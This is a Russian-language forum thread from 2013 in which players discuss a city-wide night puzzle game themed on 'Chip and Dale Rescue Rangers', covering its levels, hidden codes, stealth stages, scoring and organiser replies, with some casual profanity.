PDA

Просмотреть полную версию : 13.2 Чип и Дейл спешат на помощь от WTF.


Дейл
24-03-2013, 07:37
Спасибо, что приняли участие в нашей игре!

Статистика посчитана, сценарии открыты.

Основная игра (http://deadline.en.cx/GameDetails.aspx?gid=41677)

Бонусная игра (http://deadline.en.cx/GameDetails.aspx?gid=40729)

nadlooshi
24-03-2013, 08:04
Спасибо, зашло!
Единственное - ОЧЕНЬ хочу увидеть схему сборки этого {много мата}ного самолетика. Орговский вариант, так сказать.

sinner
24-03-2013, 08:47
Слабоумие и Отвага(с)

Ol4ik
24-03-2013, 09:19
Брифинг состоится в 10 утра у Окея на Ладожской.

половина машин на Карбышева, а бриф на Ладожской :(

Jaguar
24-03-2013, 09:39
Печаль и уныль! Впервые спал и ел в макдаке на игре. спасибо.

Странный
24-03-2013, 09:42
Печаль и уныль! Впервые спал и ел в макдаке на игре. спасибо.

там тепло и вифи ) зависть!!

Jaguar
24-03-2013, 09:44
там тепло и вифи ) зависть!!

дома удобней, чем в тачке....:p

RAVE
24-03-2013, 09:55
А на бриф никто не собирается, да?

DEd_MONro
24-03-2013, 09:55
По мне так WTF TV был намного интереснее и увлекательнее.

Никто не делал фото флешмоба в котельной?))

Zlo
24-03-2013, 09:58
я один, как мудак, после работы на бриф приехал? парковке пусто

Zlo
24-03-2013, 10:11
офигенный бриф. экипаж нонаме и всё

Странный
24-03-2013, 10:32
офигенный бриф. экипаж нонаме и всё

иди общайся )) а кто с nn там?

Laww
24-03-2013, 10:49
Спасибо за игру! Множество спорных моментов в игровой схеме.

Potaki
24-03-2013, 10:58
иди общайся )) а кто с nn там?

мы + Авалон.

Jaguar
24-03-2013, 11:03
мы + Авалон.

давай нам инфу с брифа)

Ol4ik
24-03-2013, 11:04
Спасибо за игру! Множество спорных моментов в игровой схеме.

Спасибо за игру. Множество хороших идей и черезчур корявая реализация.

Ваня, зачем ты на брифе сказал про бонусную игру, что играть можно сколько влезет?

III007III
24-03-2013, 11:07
Ваня, зачем ты на брифе сказал про бонусную игру, что играть можно сколько влезет?

почему, говорили же про стоптайм в 8.00

Potaki
24-03-2013, 11:08
давай нам инфу с брифа)
прочитали итоговый протокол) он виден

Ol4ik
24-03-2013, 11:12
почему, говорили же про стоптайм в 8.00

Писали, да.
Говорили на брифе иное.

III007III
24-03-2013, 11:15
Писали, да.
Говорили на брифе иное.

говорили что собирать бонусы можно и послетокончания основной игры, но только до 8 утра.
З.Ы. Если что, я орков не защищаю, мне игра не понравилась, да и к тому же с Гаечкой наебали =(

slavnayaya
24-03-2013, 11:40
говорили что собирать бонусы можно и послетокончания основной игры, но только до 8 утра.
З.Ы. Если что, я орков не защищаю, мне игра не понравилась, да и к тому же с Гаечкой наебали =(

Гаечкой таки оказался дбсергей?)))

Дейл
24-03-2013, 12:19
Опубликована предварительная статистика (без учета бонусной игры).
ППО.

ndevil
24-03-2013, 13:06
Спасибо за игру. в принципе вошло. вопрос по бонусам, можно фотку кода на бонусе "9.3 поле". в два экипажа там снимали - не нашли, все что можно облизали там.

KirKiller
24-03-2013, 13:48
В очередной раз убедился, что "слишком много хорошо тоже плохо". Жаль новые команды. По моему с "Цирка от WTF" игры у вас получаются по нисходящей.

flaxing
24-03-2013, 14:49
Всем спасибо за игру!

Особая благодарность команде psyhos, которая приютила меня в качестве удаленного(~3000км) штаба, очень ценю Вашу стойкость и рад, что нам удалось совместными усилиями одолеть эти 15 часов борьбы с самими собой, ведь каждая схватка, неважно насколько она качественно подготовлена, делает нас лучше и я искренне верю, что настанет время когда вы сможете оказывать серьёзную конкурецию и бороться уже не просто с собой, а целенаправленно за первое место.

Спасибо автороам! Рад был видеть задания, которые выполнить не удалось, также не могу отметить действительно интересные задумки, мне особенно понравился уровень с 70+ секторами и финишная анимация. Другие к сожалению в полусонном состоянии уже не вспомню. Если честно, ожидал 3-4 лайтовую схваточку, не обратив внимания на число авторов), так что продолжительностью вы меня тоже приятно удивили(штаба бы побольше, ждать перегоны и поиски просто зай:eek:бся).

Жду открытия сценария.

Goy
24-03-2013, 15:23
Спасибо за игру, все понравилось! Особенно флешмоб в прачечной - ну люблю я флешмобы:)

5M
24-03-2013, 16:04
Впервые, за длительное время, на игре поел в МакДаке и выспался. Как в старые, добрые времена)))
То, что видел на игре, в принципе больше понравилось, чем нет.
Не особо понял, зачем первое задание состояло из трёх частей. Сделать каждую отдельным уровнем по 1,5 часа или часу и было бы отлично. А так- не нашли один код из огромной кучи- получили слив :(
Спасибо за игру.


>отправлено с Tapatalk<

Deneb
24-03-2013, 16:44
Впервые, за длительное время, на игре поел в МакДаке и выспался. Как в старые, добрые времена)))


мы так в дозор играем иногда)

AspiRiN
24-03-2013, 16:52
С заданиями пермудрили, с полелогикой перекурили, сисек не показали, схемка корявенькая, стоптаймы - отстой, перфаков на априори перфачной игре очень мало, крыть зону даже чуть чуть круто, но одного-двух разиков в сезон достаточно.
Были на половине заданий, понравился индустриальный и наверное всё.
Пишите Цирк!

Heckfy
24-03-2013, 17:36
Цирк не играл, игра збс, монитор полетел что надо!

Maks_I
24-03-2013, 17:53
Печаль и уныль! Впервые спал и ел в макдаке на игре. спасибо.
Впервые, за длительное время, на игре поел в МакДаке и выспался.

http://cs417029.vk.me/v417029295/3942/SURfeTEkisQ.jpg

Из штаба основа норм (косяк с гайкой да, напряг). Бонусная вообще не зашла ни разу. То ли грибы другие, то ли тупеть стал.

-Antoshka-
24-03-2013, 18:10
хромая бегал как надо :) странные ощущения от игры. и зашло и не зашло. Задростство это плюс! Спать на играх это БОЛЬШОЙ минус! кидать коробку и монитор очень зашло! круть!

S3T
25-03-2013, 01:27
для меня эта игра стала вечером/ночью/утром открытий:

1. первая игра, когда я дома после 10 утра (еще не понял как это)

2. первый раз (!) в жизни потчевал в Макдаке (не понравилось, па-рам-пам-па-пам)

3. первый раз в жизни видел настолько испугавшегося водителя фургончика, который нас притер в бордюр, и увидевшего злую недовольную рыжую жилетку недовольно осматривающую колесо (вроде б все обошлось, поеду править диск и на балансировку)

4. впервые, в экпипаже было более одного покалеченного (надеюсь медицина всем поможет)

5. впервые, были конкретные координаты, но не было кода, вообще не было кода (да-да, бонусный 9.3 ждем от оргов фото кода)

6. впервые почувствовал себя очень тупым полем

в целом игра зашла, локи понравилась (как гость города, для меня пока все новое и небаянное), хочу окончательных результатов. спасибо оргам!

Punch
25-03-2013, 09:49
Вот странное дело, игра прошла, игра прошла практически без косяков, а осадок очень пакостный. Вроде и все было: и загадки, и куча бонусов, и овердофига кодов, а вот нифига не понравилось. Наелся я, наверное, играми.

Из минусов:
1. Абсолютно неоднозначная полелогика, на которую очень неплохо было бы давать подсказки. Как из задания на запахах надо выкурить, что коды есть не на всех метках - это до сих пор для меня великая тайна. В итоге потеряли чертову тучу времени, на поиск того, чего нет, заипались и убили динамику. Брунгильда, персиваль, медуза и т.д. - вообще адский ад. я вам 100500 способов могу предложить, как из них еще коорды выкурить (что мы собственно и сделали на игре) - и будут согласовываться с вашей же легендой.
2. При указанной последовательности уровней на игре почему нельзя было разнести для команд уровень с котом? В итоге адские стоптаймы... благо макдак в двух перекрестках).

P.S. Хочу Цирк-2

nadlooshi
25-03-2013, 10:01
А теперь предметнее. Мне из штаба зашло ОЧЕНЬ. Я не вспомню с ходу такой игрули, чтобы штаб вешался не от грибов, а от обилия работы (In Time в голову пришло только). Вот за это реально спасибо. Когда у тебя одновременно 100500 штабных загадок, нераскуренная основа или какая-нибудь жесть на основе, и нужно одновременно посылать экипажи по бонусам, по основе, отмечать в доке взятые клетки и цифры на них, вычислять мины... В общем, оч круто! Не помню, чтобы у нас кто-то из экипажей спал в машине...
Из минусов - трехчасовое задание (не совсем поняла его глубокого смысла) и котенок (аналогично). В первом случае получился весьма нехилый штраф за один код (который для меня тоже не совсем пока понятен - код, я имею в виду), во втором - такая же история.
А в целом - огромное спасибо! Я давно так не выматывалась на играх, но и давно так не отдыхала.

Punch
25-03-2013, 10:04
Брунгильда, персиваль, медуза и т.д. - вообще адский ад. я вам 100500 способов могу предложить, как из них еще коорды выкурить (что мы собственно и сделали на игре) - и будут согласовываться с вашей же легендой.


И можно здесь подробно выложить логику раскурки поля? желательно, с фотками... Спасибо;)

Grom
25-03-2013, 10:18
Цифровые носители не помогут. У нас даже видео есть, но составил на месте все Хекфай и вроде как без проблем.

DEd_MONro
25-03-2013, 10:21
Вы про то что в лесопарке было?

Grom
25-03-2013, 10:23
Вы про то что в лесопарке было?

Во истину!

DEd_MONro
25-03-2013, 10:25
Так там логика то простейшая.
Берется минут за 5.
Выкидываем всех персонажей не из мультика сразу, остаются дельные варианты

Есть 2 столбика в каждом из столбов имена в одинаковых строках должны совпадать, типа
петр 60 петр 30
марья 15 марья 46
...

НУ там по цветам еще соотносим и все - получаем коорды.

Ol4ik
25-03-2013, 10:30
Цифровые носители не помогут.
нормально с носителями все. сфоткали -передали. пробудлировали голосом, штаб наколдовал - получили координаты.

а вообще да, с полелогикой перебор. в погоне за желанием сделать очень круто, вышел перебор. собсно, это фишка оргов уже, имхо :)
первый уровень надо было разделить на три. котенка всем в разное время.
последнее кидание коробки - лютая дребедень (хоть и поржали знатно).
обидно за бонусную игру.
для нас игра прошла бодро и позитивно, но на каждом уровне было ощущение "что-то здесь не так".
и еще, нахуа так было зону раздувать???

nadlooshi
25-03-2013, 10:30
Смысл в том, что вот лично мне соотнести по цветам было нереально практически. Ибо и на видео, и на фото у меня было, например, три одинаковых черных цвета, а поле утром рассказало, что там был черный с золотым, просто черный и темно-синий. Хорошо, что поле сориентировалось на месте)

Punch
25-03-2013, 10:36
Так там логика то простейшая.
Берется минут за 5.
Выкидываем всех персонажей не из мультика сразу, остаются дельные варианты

Есть 2 столбика в каждом из столбов имена в одинаковых строках должны совпадать, типа
петр 60 петр 30
марья 15 марья 46
...

НУ там по цветам еще соотносим и все - получаем коорды.

Да, Димон, как-то так делал... но, блеать, не получилось. бело-синяя никак не вставала на минуты во второй координате. И била в лисий нос

DEd_MONro
25-03-2013, 10:43
Да, Димон, как-то так делал... но, блеать, не получилось. бело-синяя никак не вставала на минуты во второй координате. И била в лисий нос

не знаю - с первого раза все получилось.

Там был бело-синий и бело-голубой

sinner
25-03-2013, 10:56
не знаю - с первого раза все получилось.

Там был бело-синий и бело-голубой

)))) а каким фотоаппаратом это можно было передать в кц? Ибо мы лицезрели только синий, черный и розовый)))

DEd_MONro
25-03-2013, 10:59
)))) а каким фотоаппаратом это можно было передать в кц? Ибо мы лицезрели только синий, черный и розовый)))

снабжайте поле более качественным железом)))) или тренируйте им мозг

nadlooshi
25-03-2013, 11:00
Там был бело-синий и бело-голубой
:eek:

Kroxa
25-03-2013, 11:10
На какой из остановок и в каком конкретно месте был код с точки 5.3., которая бьет в ларек "Цветы.24 часа"?

Nearsky
25-03-2013, 11:18
На какой из остановок и в каком конкретно месте был код с точки 5.3., которая бьет в ларек "Цветы.24 часа"?

Это на площади мужества? Если да, то код был между остановками, на маленьком рекламном щите снизу.

sinner
25-03-2013, 11:27
снабжайте поле более качественным железом)))) или тренируйте им мозг

Дык блин я из кц и есть... Нихера на фотках не разобрать было(((

А, слепой.. Там про поле было.. Ну вродь с разных фотиков слали, один хер...

Confeta
25-03-2013, 11:34
пожалуй, для меня ощущения после ЧиД сопоставимы с ощущениями после Цирка. в штабе было мега-круто! каждую секунду все были чем-то заняты, да и поле не стояло на месте. ВТФ, мне кажется, я люблю ваши игры :rolleyes: хочу еще, определенно! спасибо вам за отлично проведенную ночь)

Kroxa
25-03-2013, 11:36
Про косяки этой игры напишут и без меня, так что я о положительном. Спасибо огромное ребятам, что старались с делать именно ИГРУ, а не треньку. Это первая принудительная игра, поэтому скорее всего у вас просто не хватило времени довести отличные идеи до безупречной реализации. Спасибо вам за то, что делаете игры в стиле Dead-Line, и не ставите во главу угла задротопоиск и физкультуру.

Grom
25-03-2013, 11:42
...скорее всего у вас просто не хватило времени довести отличные идеи до безупречной реализации...

Ай зачем же оргам то подсказывать??

Clinique
25-03-2013, 12:23
Про косяки этой игры напишут и без меня, так что я о положительном. Спасибо огромное ребятам, что старались с делать именно ИГРУ, а не треньку. Это первая принудительная игра, поэтому скорее всего у вас просто не хватило времени довести отличные идеи до безупречной реализации. Спасибо вам за то, что делаете игры в стиле Dead-Line, и не ставите во главу угла задротопоиск и физкультуру.
Оля верни Крохе аккаунт, мы тебя спалили =)

Book'Sir
25-03-2013, 12:26
Зашло, спасибо, в целом молодцы :)
Первый вопрос:
сколько человек писали сталкер? если один, то на всех ли метках были коды? если на всех, то где был код на метке со стрелочкими и 5ю метрами?
Второй вопросик:
Где был кодик на флешмобе в котельной у бочек наверху?

Оля верни Крохе аккаунт, мы тебя спалили =)
:):):):):)

Ol4ik
25-03-2013, 12:26
Оля верни Крохе аккаунт, мы тебя спалили =)

Гоша, просто не я одна не люблю треньки :)

Batleby
25-03-2013, 12:27
Второй вопросик:
Где был кодик на флешмобе в котельной у бочек наверху?


Там где кирпич вывалился:D

Book'Sir
25-03-2013, 12:29
Там где кирпич вывалился:D
там где кирпич вывалился вроде желтым по желтым было... или до меня история про кирпич дошла просто в этом месте?:D

Batleby
25-03-2013, 12:33
Ну мож ошибаюсь) но кирпич доставил)))

DEd_MONro
25-03-2013, 12:33
Ты про 2 больших бочки внутри одной из которых код дозора? или про те что в конце комнаты?

miibus
25-03-2013, 12:35
Зашло, спасибо, в целом молодцы :)

Второй вопросик:
Где был кодик на флешмобе в котельной у бочек наверху?



если там где ещё окошко было на улицу, то левее в углу стенки впритык с потолком, тонким маркером или фломастером чёрным по белому.

Book'Sir
25-03-2013, 12:38
Ты про 2 больших бочки внутри одной из которых код дозора? или про те что в конце комнаты?
про первые с дозоровским
но кирпич доставил)))
еще как))))))))
если там где ещё окошко было на улицу, то левее в углу стенки впритык с потолком, тонким маркером или фломастером чёрным по белому.
там я взял быстро, даже в дырку не лазал)

DEd_MONro
25-03-2013, 12:44
Тогда тот код был справа на окне)

Book'Sir
25-03-2013, 12:45
Тогда тот код был справа на окне)
спс, я идиот :(

Punch
25-03-2013, 13:01
А, еще понял на игре, что айпад/айфон - незаменимая вещь.
Сижу, значит, пытаюсь как-то подредактировать картинку, которая в задании в ворде пришла. Вдруг с задних рядов раздается голос Марка: "Панч, ты видел тут карта какая-то?". Я: "Да ну нах, покажи!". Показывает - правда карта, открыл просто документ айпадом. проверяю на айфоне - такая же хрень... поехали)

второй раз был с гангнам стайл - марк сидел удерживал двумя пальцами картинку, чтоб она не переключала изображения, а я сравнивал по первоисточнику)

Yucos
25-03-2013, 13:07
А, еще понял на игре, что айпад/айфон - незаменимая вещь.
Сижу, значит, пытаюсь как-то подредактировать картинку, которая в задании в ворде пришла. Вдруг с задних рядов раздается голос Марка: "Панч, ты видел тут карта какая-то?". Я: "Да ну нах, покажи!". Показывает - правда карта, открыл просто документ айпадом. проверяю на айфоне - такая же хрень... поехали)

второй раз был с гангнам стайл - марк сидел удерживал двумя пальцами картинку, чтоб она не переключала изображения, а я сравнивал по первоисточнику)

вот плюс один. ТА же история была с картой) яблоко рулит (на андроидах не проверяли, ибо таковых в экипаже нет).
гангнам стайл мы в quicktime player открыли и листали спокойно, как слайды.

Fomka
25-03-2013, 13:09
Сижу, значит, пытаюсь как-то подредактировать картинку, которая в задании в ворде пришла. Вдруг с задних рядов раздается голос Марка: "Панч, ты видел тут карта какая-то?". Я: "Да ну нах, покажи!". Показывает - правда карта, открыл просто документ айпадом. проверяю на айфоне - такая же хрень... поехали)

Можно было и без айфона - у нас в штабе кто-то открыл wordpadом по умолчанию вместо ворда и тоже увидел карту =)

Clinique
25-03-2013, 13:21
Гоша, просто не я одна не люблю треньки :)
Я до сих пор не могу понять в чем разница, если в людях в тельняшках убеждающих окружающих что они коты, которые просят добыть им валерианки путем поиска и последующего решения ВНИМАНИЕ!!! математических формул Оо то я отказываюсь дальше искать разницу в определении игр. А вообще все давно за нас придумано. Загляните на домен Ярика. там давно классификацию более четкую придумали. По 5 пунктам, от одной до трез звезд.

По мне игра тренька тренькой, обна бонусная игра чего стоит, еще и по остановкам и щитам. Тренистее не придумаешь 71 кодюль еще и по всему городу и каждый загадан. И это при том что на основе олимпийки на 70 кодов и утроенное задание. Так что явно двойные стандарты у вам девчонки. За картонного кота, наркоманов в тельняшках готовы называть игру игрой а не тренькой.

=))))

Jaguar
25-03-2013, 14:03
Я до сих пор не могу понять в чем разница, если в людях в тельняшках убеждающих окружающих что они коты, которые просят добыть им валерианки путем поиска и последующего решения ВНИМАНИЕ!!! математических формул Оо то я отказываюсь дальше искать разницу в определении игр. А вообще все давно за нас придумано. Загляните на домен Ярика. там давно классификацию более четкую придумали. По 5 пунктам, от одной до трез звезд.

По мне игра тренька тренькой, обна бонусная игра чего стоит, еще и по остановкам и щитам. Тренистее не придумаешь 71 кодюль еще и по всему городу и каждый загадан. И это при том что на основе олимпийки на 70 кодов и утроенное задание. Так что явно двойные стандарты у вам девчонки. За картонного кота, наркоманов в тельняшках готовы называть игру игрой а не тренькой.

=))))

Клин, все просто, на каждый уровень поисковый ставь агента в "кокошнике", который придумает легенду зачем искать коды...и уже не тренька будет):D

Pukkaras
25-03-2013, 14:07
Повеселила организация уровня сталкер.. Это писец...
Лока - какой то сраный недострой без всякой охраны, камер, собак итп, При этом строго по два человека со стоптаймами пускали на уровень, отслеживали фонари и шумы. Но в тоже время сделали уровень линейным что команды все скопились в очередь, понаставив заведенные машины возле локи, зачем то сделали ли полелогику, которую все брали по полчаса. ну просто в шоке я ребят..
Если делаете стелс-уровень, то старайтесь его организовать таким образом чтоб команды его проходили как можно быстрее, если там ничего интересного на самой локе, не делайте его линейным или уж пусть все сразу забегут быстро снимут и уйдут, это лучше чем очереди выстраивать со стоптаймами, ну или на крайняк точку старта делать не прям под локой, а в 200х метрах.
Вообщем никакого негатива уровень не доставил, наоборот даже повеселил и полелогика интересная, но вот организация просто смешная.
сталкер в бетонной коробке на линейной игре в начале игры со стоптаймами с 30минутным временем взятия на 2 человека в многоэкипажной игре...

В целом же игра скорей понравилась, но, наверное, благодаря тому, что были почти на всех основных уровнях.

Рада, прости что звонил по коду на бонусной игре, просто по бонусу на детской площадке было две паутинки расположенных в 30метрах друг от друга, мы сперва искали не на той.
А вообще такой подход что бонусаня игра для, того чтобы экипажи не скучали, а дрочили детские площадки, клумбы, говнодомики итп мне кажется не верным. Просто надо стараться делать игру так, чтобы никто не стоял и не скучал, кроя зону, делать разделения, ветки, быстрые уровни или же бонусы делать смысловой частью игры. В этом плане первый уровень был нормалек, тока чуток проще стоило бы подуровни сделать, а то как показывает стата все было не очень лайтово. Например, что за садизм делать подсказку по логике на уровне через 90минут, зачем так долго заставлять игроков мерзнуть на локе ..

Запомнился первый уровень, потому что долго брали и хорошая задумка с аромологикой, ударников, потому что долго стояли, последний уровень, потому что классный перфак, ну еще олимпийка доставила!

Sgushchenka
25-03-2013, 14:22
мяу... мяу... шмяк! шмяк! шмяк!

спасибо за игру.

Ol4ik
25-03-2013, 14:34
Я до сих пор не могу понять в чем разница, если в людях в тельняшках убеждающих окружающих что они коты, которые просят добыть им валерианки путем поиска и последующего решения ВНИМАНИЕ!!! математических формул Оо то я отказываюсь дальше искать разницу в определении игр. А вообще все давно за нас придумано. Загляните на домен Ярика. там давно классификацию более четкую придумали. По 5 пунктам, от одной до трез звезд.

По мне игра тренька тренькой, обна бонусная игра чего стоит, еще и по остановкам и щитам. Тренистее не придумаешь 71 кодюль еще и по всему городу и каждый загадан. И это при том что на основе олимпийки на 70 кодов и утроенное задание. Так что явно двойные стандарты у вам девчонки. За картонного кота, наркоманов в тельняшках готовы называть игру игрой а не тренькой.

=))))
Гоша, не надо путать теплое с мягким.
на Треньке обычно что происходит? Есть лока, стопицот кодов и люди ищут. Так вот когда на игре тоже самое, только лок 10 - то и игра тренька.
А когда на игре тема, сюжет, перфак, агентские и проче, когда все выдеражано, то это Игра.

з.ы. Я не говорила, кстати, что мне игра понравилась. Странный агентский последний, нелепое совершенно объединение в начале, перекуры в полелогике, тему легко можно сменить с "Чип и Дейл" на "Черный плащ" или еще чего. и проч. НО! это игра была гораздо меньшей тренькой, чем прошлая, например.

з.ы.ы. и еще, ну не понимаешь ты разницы, твое право. у каждого человека свое мнение, и оно может не совпадать с твоим :)

Ol4ik
25-03-2013, 14:37
Клин, все просто, на каждый уровень поисковый ставь агента в "кокошнике", который придумает легенду зачем искать коды...и уже не тренька будет):D

а чего смешного?
подтанцовка у певца уже из его выступления делвет шоу, а не просто номер.
так и тут, добавь цель, кокшники и антураж - будет игра, а не тренька.

DEd_MONro
25-03-2013, 14:50
"ушел переосмыслять взгляды на жизнь и положение дел в своем бренном существовании"

Jaguar
25-03-2013, 14:53
а чего смешного?
подтанцовка у певца уже из его выступления делвет шоу, а не просто номер.
так и тут, добавь цель, кокшники и антураж - будет игра, а не тренька.

так смешно...что суть таже самая, ищи 100500 кодов только под музыку;)

Velkopiterskij
25-03-2013, 14:54
так смешно...что суть таже самая, ищи 100500 кодов только под музыку;)

Так под музыку веселее же, нет?

Jaguar
25-03-2013, 14:58
Так под музыку веселее же, нет?

мне не принципиально, например.

Pukkaras
25-03-2013, 14:58
не все ли равно чо там ольчик считает тренькой?...

Velkopiterskij
25-03-2013, 15:00
не все ли равно чо там ольчик считает тренькой?...

Миша, мне например всё равно, что ты считаешь игрой. И что дальше? Я тоже должен об этом всем рассказывать?

Ol4ik
25-03-2013, 15:01
не все ли равно чо там Ольчик считает тренькой?...

поверь, очень многим в проекте абсолютно все равно, что именно ты считаешь игрой, и что?

з.ы. Имена с большой буквы пишутся.

Pukkaras
25-03-2013, 15:02
Миша, мне например всё равно, что ты считаешь игрой. И что дальше? Я тоже должен об этом всем рассказывать?
ничто не мешает ольчику рассказывать что такое тренька, а тебе что такое игра и никто не заставляет читать эти посты. Модераторы посчитают оффтопом - снесут .

Jaguar
25-03-2013, 15:04
не все ли равно чо там ольчик считает тренькой?...

нет, не все равно! Она высказывает свое мнение, другие свое. Это никто не запрещал.

Дмитрич
25-03-2013, 15:12
Карась запретил. Расходимся, посоны :D

Дмитрич
25-03-2013, 15:18
кстати, игра получилась как БМВ...всмысле хЗ :)
с одной стороны: более менее динамичная..спать начало тянуть только к 6 утра.. + было пара интересных мест.
с другой: жестко йобнутая полелогика. + моему экипажу не встретилось агентов, зато мы по бонусам покатались)


В общем неплохая игра с послевкусием рекламных щитов.

Velkopiterskij
25-03-2013, 15:20
Спасибо оргам за уровнеьна Иоффе) Очень понравился.

Odin
25-03-2013, 15:27
Дмитрич, а вы доехали до Лааааапатина, или домой спать отьехали?...

З.Ы. Да, и я хочу видео с детально заснятым убийством Толстопуза... Я до сих пор осознать не могу, как можно было слить уровень, куда-то кидая коробки?... о_0

Дмитрич
25-03-2013, 15:33
Один, мы снялись в 8,15 примерно) так что вроде нет

Laww
25-03-2013, 15:43
По поводу игры:
- совершенно не понятно, зачем было делать первый 3-х часовой уровень линейным, тем более, как оказалось, с косяком в текстовке одного из подуровней, что привело к столпотворению на каждой из трех лок;
- сталкер со стоптаймом в 40 минут + умнокодом. Нахера делать такой уровень в недостроенном ТЦ - не понятно. По моему мнению, если хочется сделать сталкер уровень, делай его по типу Summa Game;
- не понравился последний уровень "на везение";

Больше придраться не к чему ) Спасибо за игру )

AlexM
25-03-2013, 15:52
Смысл в том, что вот лично мне соотнести по цветам было нереально практически. Ибо и на видео, и на фото у меня было, например, три одинаковых черных цвета, а поле утром рассказало, что там был черный с золотым, просто черный и темно-синий. Хорошо, что поле сориентировалось на месте)
Черный и темно-синий различались по толщине линий:) Все остальные цвета на фотографиях были видны отлично.

Muzzy
25-03-2013, 16:18
... ну или на крайняк точку старта делать не прям под локой, а в 200х метрах.

Миш, точку старта на локе, к которой можно подойти с любой стороны делать чревато. Всегда найдутся индивиды, которые увидев метку с гиканьем и улюлюканием ломанутся туда толпой забыв про агентов и про сталкер.

Ну и кстати говоря, все комады убедительно просили оставить не более одного экипажа и отогнать его в сторонку. Тот же флешмоб, который устроила ваша команда вообще слабо сопоставим с понятием "сталкер".

Про неохраняемость объекта - необоснованная чушь. Желающих проверить надо было запускать с обратной стороны.
Тестерам пришлось не единожды пообщаться с УВД. Потому и были предприняты меры предосторожности.

YaWeR
25-03-2013, 16:21
Ну и кстати говоря, все комады убедительно просили оставить не более одного экипажа и отогнать его в сторонку. Тот же флешмоб, который устроила ваша команда вообще слабо сопоставим с понятием "сталкер".
.
Так надо им штраф впаять!

mark.
25-03-2013, 16:28
Согласен насчет штрафа)))

грициан
25-03-2013, 16:38
Всячески поддерживаю!))

Effa
25-03-2013, 16:40
Даешь честное и объективное командное голосование!

Го
25-03-2013, 16:52
Честный и объективный всекомандный штраф! Давайте исходить от обратного - кто-нибудь заходил тихо? :D

Куличок
25-03-2013, 17:13
Честный и объективный всекомандный штраф! Давайте исходить от обратного - кто-нибудь заходил тихо? :D

Да вроде не было шумно там)

А где там был код по стрелочке "5м"? Если по балке вдоль стены, куда она и указывала, то это у меня как-то плохо соотносится с озвученным оргами "КО максимум 1+".

Heckfy
25-03-2013, 17:42
Спасибо оргам за уровнеьна Иоффе) Очень понравился.

Икалось ли тебе, Велко?

Velkopiterskij
25-03-2013, 17:47
Икалось ли тебе, Велко?

Нет. Может вы кого другого вспоминали?

mark.
25-03-2013, 17:49
Да вроде не было шумно там)

А где там был код по стрелочке "5м"? Если по балке вдоль стены, куда она и указывала, то это у меня как-то плохо соотносится с озвученным оргами "КО максимум 1+".

Не до ходя до столба на уровне пояса

Куличок
25-03-2013, 19:44
Не до ходя до столба на уровне пояса

Спс. Значит слепой) Хотя все равно не очень понял, где там ко1)

Potaki
25-03-2013, 21:21
а когда стату ждать?

Muzzy
25-03-2013, 21:34
Честный и объективный всекомандный штраф! Давайте исходить от обратного - кто-нибудь заходил тихо? :D

Щас боюсь показаться предвзятым. Аккуратнее всех на мой взгляд сработали брейкеры. Спокойно вошли, без лишней суеты и кипеша прочесали здание и вышли. На самом деле, проблем с "входом-выходом" не было ни у кого. Была куча претензий к командам по поводу поведения НА уровне, но коль скоро обошлось без общения с ментами, коллегиально было решено штрафов никому не навешивать. А вот за пределами забора творились мракобесие и махновщина.

Goy
25-03-2013, 21:35
Вот тут сравнивают эту игру и Цирк. А мне так наоборот больше эта понравилась, т.к. не ездил по всему городу фотки собирать. Поэтому, кому как повезло - кто бонусы собирал, кто на основе был.
А деление первого уровня на 3 было хорошей идей - никто не стоял. Единственное, что-то не то было с закуркой, т.к. по факту, на прачечную было 1,5 часа вместо 3.

YaWeR
25-03-2013, 22:00
Щас боюсь показаться предвзятым. Аккуратнее всех на мой взгляд сработали брейкеры. Спокойно вошли, без лишней суеты и кипеша прочесали здание и вышли. На самом деле, проблем с "входом-выходом" не было ни у кого. Была куча претензий к командам по поводу поведения НА уровне, но коль скоро обошлось без общения с ментами, коллегиально было решено штрафов никому не навешивать. А вот за пределами забора творились мракобесие и махновщина.

Во, на основании данного сообщения требую начислить всем, кроме брейкеров, штраф в размере 1,5 часа за не соблюдения правил на сталкере!
А то что менты не приехали, так это просто повезло, но все же шумели, так что штраф им!
В ДЛ1 за это точно бы штраф дали часа 3, а я тут только 1,5 предлагаю!

Punch
25-03-2013, 22:18
Во, на основании данного сообщения требую начислить всем, кроме брейкеров, штраф в размере 1,5 часа за не соблюдения правил на сталкере!
А то что менты не приехали, так это просто повезло, но все же шумели, так что штраф им!
В ДЛ1 за это точно бы штраф дали часа 3, а я тут только 1,5 предлагаю!

Кстати, уважаемые орги, маленький совет по сталкерам: если уж говорите, чтобы на улицу фонарями не светили, не рисуйте коды и метки на окнах;)

Grom
25-03-2013, 22:37
Чота да, второй день уже стату считают видать...

YaWeR
25-03-2013, 22:44
Чота да, второй день уже стату считают видать...

Штрафы с учетом правил ДЛа вычисляют!=)

Jaguar
25-03-2013, 23:23
Считайте, что у вас стоптайм))

G1ZM0
25-03-2013, 23:52
Кстати, уважаемые орги, маленький совет по сталкерам: если уж говорите, чтобы на улицу фонарями не светили, не рисуйте коды и метки на окнах;)

вот +много!!:D

Jaguar
26-03-2013, 10:32
а там статистики то не ожидается?

Velkopiterskij
26-03-2013, 10:34
а там статистики то не ожидается?
У оргов ещё сутки в запасе.

Jaguar
26-03-2013, 11:14
У оргов ещё сутки в запасе.

все молчу молчу))

Гаечка
26-03-2013, 12:05
Статистика посчитана, сценарии открыты.

Основная игра (http://deadline.en.cx/GameDetails.aspx?gid=41677)

Бонусная игра (http://deadline.en.cx/GameDetails.aspx?gid=40729)

Крайний срок приема апелляций - полдень 27 марта.

Гаечка
26-03-2013, 12:05
Ваня, зачем ты на брифе сказал про бонусную игру, что играть можно сколько влезет?

говорили что собирать бонусы можно и послетокончания основной игры, но только до 8 утра.

З.Ы. Если что, я орков не защищаю, мне игра не понравилась, да и к тому же с Гаечкой наебали =(

По информации от орга, присутствовавшего на брифе, время бонусной игры было озвучено четко: до 8 часов утра. Относительно времени бонусной игры был задан вопрос о том, ограничена ли она временем прохождения основной игры. На этот вопрос оргом был дан ответ “Нет, не ограничена: бонусная игра может продолжаться и после прохождения основной”. Кроме того, в движке в бонусной игре шел обратный отсчет времени, показывавший, сколько времени осталось у команды для прохождения этой игры.

Гаечка
26-03-2013, 12:06
Спасибо автороам! Рад был видеть задания, которые выполнить не удалось, также не могу отметить действительно интересные задумки, мне особенно понравился уровень с 70+ секторами и финишная анимация.

Жду открытия сценария.

Спасибо за отзыв! Вливайся, в Дедлайне всегда (https://docs.google.com/spreadsheet/ccc?key=0AoPnLW92pPCCdE1jblJ0UEt6SF8wX3VhQk5DcWpxa Hc#gid=1) интересно )

